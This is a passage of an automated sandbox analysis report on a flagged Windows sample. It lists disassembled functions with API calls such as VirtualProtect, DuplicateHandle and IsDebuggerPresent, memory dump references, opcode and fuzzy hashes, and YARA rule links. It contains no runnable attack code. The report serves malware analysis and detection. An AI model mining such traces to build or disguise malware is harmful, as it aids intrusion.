                                                                                                                                      • Instruction ID: 32ddf0b47e8a2e4cb7c8e22311ff103a0ec1fe4cd3af6bd8dfb29e1816328d90
                                                                                                                                      • Opcode Fuzzy Hash: 82c8e83d64718e9e39263ed02e21600570f1db8f8bea9459ca93950cd16ebb9e
                                                                                                                                      • Instruction Fuzzy Hash: E33123B490024ACFDB10CFA9D480B9EBBF0FF49314F14856AD418BB211D779A946CFA5
                                                                                                                                      Function 351838E1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 448 351838e1-351838e3 449 351838e8-3518397c DuplicateHandle 448->449 450 3518397e-35183984 449->450 451 35183985-351839a2 449->451 450->451
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3518396F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: f1f99e875c43f1cfd3b4a1d756cc85de3fd3afad6b7b3568e6aba9835e223b0c
                                                                                                                                      • Instruction ID: 801c2ab123468f265612ebf47f5ff76b79529f5c1a358ee0f1a5f904b356ab24
                                                                                                                                      • Opcode Fuzzy Hash: f1f99e875c43f1cfd3b4a1d756cc85de3fd3afad6b7b3568e6aba9835e223b0c
                                                                                                                                      • Instruction Fuzzy Hash: 9821E5B5D00249EFDB10CFAAD984ADEBBF8EB48310F14841AE918A7350D378A944CF65
                                                                                                                                      Function 351838E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 454 351838e8-3518397c DuplicateHandle 455 3518397e-35183984 454->455 456 35183985-351839a2 454->456 455->456
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3518396F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 3cf4e7ee546ed15022e7d9c5677d92cd616f39444217d97768de403bd6a4cf70
                                                                                                                                      • Instruction ID: 2635ed002158e0e6e65f8e70ea5096689547a1e1643535bd2001b68eb89b4115
                                                                                                                                      • Opcode Fuzzy Hash: 3cf4e7ee546ed15022e7d9c5677d92cd616f39444217d97768de403bd6a4cf70
                                                                                                                                      • Instruction Fuzzy Hash: B221A4B5D00249DFDB10CFAAD984ADEFBF8EB48310F14841AE958A7350D378A954CF65
                                                                                                                                      Function 351855C0 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 459 351855c0-3518560a 461 3518560c 459->461 462 35185616-35185646 EnumThreadWindows 459->462 465 35185614 461->465 463 35185648-3518564e 462->463 464 3518564f-3518567c 462->464 463->464 465->462
                                                                                                                                      APIs
                                                                                                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 35185639
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2941952884-0
                                                                                                                                      • Opcode ID: f1d52f1d984191a34f5739e541d8a65a836ebfad1ffb8704b1aabf374a16c8bf
                                                                                                                                      • Instruction ID: a005a8d4b44d7549a246436e7fa0d3fddcb139cb76645545acff87d1c4d7c5a6
                                                                                                                                      • Opcode Fuzzy Hash: f1d52f1d984191a34f5739e541d8a65a836ebfad1ffb8704b1aabf374a16c8bf
                                                                                                                                      • Instruction Fuzzy Hash: 222135B1900209DFDB10CF9AC840BEEFBF4EB88320F10842AD415A3250D778A945CF65
                                                                                                                                      Function 35181F9C Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 468 35181f9c-3518599b 470 3518599d-351859a0 468->470 471 351859a3-351859a7 468->471 470->471 472 351859a9-351859ac 471->472 473 351859af-351859e2 MessageBoxW 471->473 472->473 474 351859eb-351859ff 473->474 475 351859e4-351859ea 473->475 475->474
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,351822A5,?,?,?), ref: 351859D5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2030045667-0
                                                                                                                                      • Opcode ID: 8f33f83841e6c7bd6d08265bc8070c1815442f49b1e2009538be7af577d51582
                                                                                                                                      • Instruction ID: 0fd8cf57267484a253a363f3cbb6d3a198a459107da5d213034128f9efa9d583
                                                                                                                                      • Opcode Fuzzy Hash: 8f33f83841e6c7bd6d08265bc8070c1815442f49b1e2009538be7af577d51582
                                                                                                                                      • Instruction Fuzzy Hash: 0721F3B5C04349EFDB10CF9AD884ADEBBB5FB88320F11842AE519A7200C375A944CFA5
                                                                                                                                      Function 35185950 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 477 35185950-3518599b 479 3518599d-351859a0 477->479 480 351859a3-351859a7 477->480 479->480 481 351859a9-351859ac 480->481 482 351859af-351859e2 MessageBoxW 480->482 481->482 483 351859eb-351859ff 482->483 484 351859e4-351859ea 482->484 484->483
                                                                                                                                      APIs
                                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,351822A5,?,?,?), ref: 351859D5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2030045667-0
                                                                                                                                      • Opcode ID: 1d6cf9b404578fef429133afad3ef80aed05903d7920fd510a944272185eddf1
                                                                                                                                      • Instruction ID: bb61b479f83b8d6f88bd2cad2fbf7c879520b31c032a640736e7679c923809fb
                                                                                                                                      • Opcode Fuzzy Hash: 1d6cf9b404578fef429133afad3ef80aed05903d7920fd510a944272185eddf1
                                                                                                                                      • Instruction Fuzzy Hash: 2821F3B5D05349DFCB10CF9AD884ADEBBB5FB88310F11846ED459A7200C375A944CFA5
                                                                                                                                      Function 351855C8 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 486 351855c8-3518560a 487 3518560c 486->487 488 35185616-35185646 EnumThreadWindows 486->488 491 35185614 487->491 489 35185648-3518564e 488->489 490 3518564f-3518567c 488->490 489->490 491->488
                                                                                                                                      APIs
                                                                                                                                      • EnumThreadWindows.USER32(?,00000000,?), ref: 35185639
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2941952884-0
                                                                                                                                      • Opcode ID: f57cd5a64810277233b6be917a3736e70f4089677b87109e04b8f9add32c79aa
                                                                                                                                      • Instruction ID: 41ff899c3c46fc913eae037e35524524ee95836303e545b440742c72a2e20f51
                                                                                                                                      • Opcode Fuzzy Hash: f57cd5a64810277233b6be917a3736e70f4089677b87109e04b8f9add32c79aa
                                                                                                                                      • Instruction Fuzzy Hash: 1F2124B190060ADFDB10CF9AC940BEEFBF8EB88320F14842AD415A7250D778A945CF65
                                                                                                                                      Function 31D79130 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 31D791A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2731211299.0000000031D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 31D70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31d70000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 251b26b1245e6d88c8fbd426da1c12dbfc570a0356997cdb8f99289d9dd168fd
                                                                                                                                      • Instruction ID: a5ad447b7536e9bf7102f61d74c3ea20946c69a9dfdcd4c290df73cca9dfb18f
                                                                                                                                      • Opcode Fuzzy Hash: 251b26b1245e6d88c8fbd426da1c12dbfc570a0356997cdb8f99289d9dd168fd
                                                                                                                                      • Instruction Fuzzy Hash: A41124B19003499FDB10DFAAC880A9EFBF4EF88320F10842AD419A7200C7799900CFA5
                                                                                                                                      Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                      Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                      Function 31D79308 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2731211299.0000000031D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 31D70000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31d70000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                      • Opcode ID: 04e000368eb8136490b6e3ffdf018f4612043fe40fff679ce6d6c6d840f83a95
                                                                                                                                      • Instruction ID: f015c6308ff94bb11c875611a44bf323eab525923eec079b584e6b147ec49807
                                                                                                                                      • Opcode Fuzzy Hash: 04e000368eb8136490b6e3ffdf018f4612043fe40fff679ce6d6c6d840f83a95
                                                                                                                                      • Instruction Fuzzy Hash: 77113AB1900349CFDB10DFAAC4457DEFBF4AF89720F248419D519A7240CB79A940CBA5
                                                                                                                                      Function 31C2D5F0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de516d01558c36048a984cdd0a693d25ab42f0a7bd18a4958dd78c6f7f021646
                                                                                                                                      • Instruction ID: 7f974d6c4e025f32f94e329f7555c75c602c5a2ccacb59b174ee49dad1a061a8
                                                                                                                                      • Opcode Fuzzy Hash: de516d01558c36048a984cdd0a693d25ab42f0a7bd18a4958dd78c6f7f021646
                                                                                                                                      • Instruction Fuzzy Hash: B72133B6504340EFEF12DF10D9D0B26BF61FB98310F2089A8E8084B206C336D846CBA1
                                                                                                                                      Function 31C2D6DC Relevance: .1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ae3c8c89933af1faa1eef4e81470267d60e321b142d95c3f452eb08a127a8d8c
                                                                                                                                      • Instruction ID: 562b56c5ac4358ae20976a80edc0a1cfd9a026c56900ffef981d000357b2fe12
                                                                                                                                      • Opcode Fuzzy Hash: ae3c8c89933af1faa1eef4e81470267d60e321b142d95c3f452eb08a127a8d8c
                                                                                                                                      • Instruction Fuzzy Hash: 43210676504384DFEF01EF10DDD0B26BF66FBA4714F208569E9084B24AC33AD856CBA2
                                                                                                                                      Function 31C2D5EB Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0a502eb29964fb70b335d053951dd0a963bd1f190f266041485f5dd999e37dee
                                                                                                                                      • Instruction ID: d1309228fd369246e901efeed5c95731d28c34a67bf352b08f585200e32eed98
                                                                                                                                      • Opcode Fuzzy Hash: 0a502eb29964fb70b335d053951dd0a963bd1f190f266041485f5dd999e37dee
                                                                                                                                      • Instruction Fuzzy Hash: FE11D3B6504280DFDB12CF10D9D4B16BF72FB94314F24C9A9D8494B256C33AD45ACBA2
                                                                                                                                      Function 31C2D6D7 Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0a502eb29964fb70b335d053951dd0a963bd1f190f266041485f5dd999e37dee
                                                                                                                                      • Instruction ID: 91829d2739b39b40008a15a9b7b5f9b05dba271a1f2afd91a62fda416f9bd4b4
                                                                                                                                      • Opcode Fuzzy Hash: 0a502eb29964fb70b335d053951dd0a963bd1f190f266041485f5dd999e37dee
                                                                                                                                      • Instruction Fuzzy Hash: 4311D37A504284DFDB02CF10D9D0B16BF72FB94714F24C6A9D8098B25AC33AD45ACBA2
                                                                                                                                      Function 31C2D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bf7cca60397221e47428da704e34dd111049ee8d770e323539f6c6e70de5a611
                                                                                                                                      • Instruction ID: a5ad826f233f227425dc4ba510ee560395d4c52bbe725b25a495ac9dd74bbefc
                                                                                                                                      • Opcode Fuzzy Hash: bf7cca60397221e47428da704e34dd111049ee8d770e323539f6c6e70de5a611
                                                                                                                                      • Instruction Fuzzy Hash: BE01296100E3C49FE7038B258CA4A66BFB4AF53264F1981DBD988CF1A3C2695849C772
                                                                                                                                      Function 31C2D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2721070115.0000000031C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31C2D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_31c2d000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8945ead11496aab818587a13778d6f8793064fc4f1696a468eb306b17801e904
                                                                                                                                      • Instruction ID: fafc1aa9908ec80f64a25fdba029846e8af4bf8a32df0083aaea3ad5124bda0e
                                                                                                                                      • Opcode Fuzzy Hash: 8945ead11496aab818587a13778d6f8793064fc4f1696a468eb306b17801e904
                                                                                                                                      • Instruction Fuzzy Hash: 4B01F271004344EFFB014A26CD90B66FFA8EF523E4F08C01AED488A296C67C9846C7B1

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                      Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,31B118E8), ref: 004170C5
                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                      Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                      Download Yara Rule
